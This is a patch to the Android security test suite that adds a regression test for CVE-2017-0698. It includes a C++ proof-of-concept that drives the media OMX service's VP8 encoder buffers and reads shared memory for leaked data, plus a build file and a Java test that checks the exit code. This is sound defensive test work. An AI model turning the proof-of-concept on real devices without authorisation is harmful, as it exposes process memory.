CTS test for Android Security b/35467458 b/72388981
Test: successful run of newly introduced CTS test case.
Bug:35467458
Bug:72388981
Change-Id: I877c1c33cfff874405551920de52b206a095ab5c
(cherry picked from commit 3ac8a06d2fc850560e8bb17fccefbe14b005ebab)
Merged-In: I877c1c33cfff874405551920de52b206a095ab5c
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 69a16e0..20f5fe7 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -111,6 +111,7 @@
<!--__________________-->
<!-- Bulletin 2017-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0698->/data/local/tmp/CVE-2017-0698"/>
<option name="push" value="CVE-2016-2109->/data/local/tmp/CVE-2016-2109"/>
<!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk
new file mode 100644
index 0000000..89afaff
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk
@@ -0,0 +1,38 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0698
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES := $(TOP)/frameworks/av/include \
+ $(TOP)/frameworks/av/media/libstagefright \
+ $(TOP)/frameworks/native/include/media/openmax \
+ $(TOP)/hardware/qcom/media/msm8996/mm-core/inc
+
+LOCAL_SHARED_LIBRARIES := libstagefright libmedia libutils libstagefright_foundation \
+ libgui liblog libui libbinder
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS := -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp b/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp
new file mode 100644
index 0000000..f12e6dc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp
@@ -0,0 +1,132 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <binder/IServiceManager.h>
+#include <binder/MemoryDealer.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <OMX_Component.h>
+#include <OMX_IndexExt.h>
+#include <OMX_QCOMExtns.h>
+#define VULNERABLE 113
+
+using namespace android;
+
+template <class T>
+static void InitOMXParams(T *params) {
+ params->nSize = sizeof(T);
+ params->nVersion.s.nVersionMajor = 1;
+ params->nVersion.s.nVersionMinor = 0;
+ params->nVersion.s.nRevision = 0;
+ params->nVersion.s.nStep = 0;
+}
+
+struct DummyOMXObserver : public BnOMXObserver {
+ public:
+ DummyOMXObserver() {}
+
+ virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+ protected:
+ virtual ~DummyOMXObserver() {}
+};
+
+bool connectOMX(sp<IOMX> &omx) {
+ sp<IBinder> binder;
+ sp<IServiceManager> sm = defaultServiceManager();
+ binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+ if (binder == NULL) {
+ return false;
+ }
+ omx = service->getOMX();
+ if (omx == NULL) {
+ return false;
+ }
+ return true;
+}
+
+int main() {
+ sp<IOMX> service;
+ if (connectOMX(service) == false) return -1;
+
+ IOMX::node_id node = 0;
+
+ const char *codecName = "OMX.google.vp8.encoder";
+
+ sp<DummyOMXObserver> observer = new DummyOMXObserver();
+
+ status_t err = service->allocateNode(codecName, observer, nullptr, &node);
+ if (err != OK) {
+ return -1;
+ }
+
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ InitOMXParams(&def);
+ def.nPortIndex = 0;
+ err = service->getParameter(node, OMX_IndexParamPortDefinition, &def,
+ sizeof(def));
+
+ int inMemSize = def.nBufferCountActual * def.nBufferSize;
+ int inBufferCnt = def.nBufferCountActual;
+ int inBufferSize = inMemSize / inBufferCnt;
+
+ sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
+ IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+ List<sp<IMemory>> inQueue;
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ sp<IMemory> memory = dealerIn->allocate(inBufferSize);
+ err = service->useBuffer(node, 0, memory, &inBufferId[i], inBufferSize);
+ inQueue.push_back(memory);
+ }
+
+ sleep(1);
+
+ MetadataBufferType type = kMetadataBufferTypeGrallocSource;
+ err = service->storeMetaDataInBuffers(node, 0, (OMX_BOOL)1, &type);
+
+ sp<GraphicBuffer> graphicbuffer =
+ new GraphicBuffer(def.format.video.nFrameWidth,
+ def.format.video.nFrameHeight, PIXEL_FORMAT_RGBX_8888,
+ android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER);
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ err = service->updateGraphicBufferInMeta(node, 0, graphicbuffer,
+ inBufferId[i]);
+ }
+
+ sleep(1);
+
+ while (!inQueue.empty()) {
+ String8 s;
+ sp<IMemory> memory = *inQueue.begin();
+
+ for (int i = 0; i < inBufferSize / 4; i++) {
+ int val = *((int *)memory->pointer() + i);
+ if (val != 0) {
+ char tmp[64];
+ snprintf(tmp, 64, "0x%x ", val);
+ s.append(tmp);
+ }
+ }
+ if (!s.isEmpty()) return VULNERABLE;
+ inQueue.erase(inQueue.begin());
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
index 1bf5b9a..8c9ed78 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -33,4 +33,12 @@
getDevice(), 60));
}
- }
+ /**
+ * b/35467458
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0698() throws Exception {
+ assertFalse("VULNERABLE EXIT CODE FOUND", AdbUtils.runPocCheckExitCode("CVE-2017-0698",
+ getDevice(), 60));
+ }
+}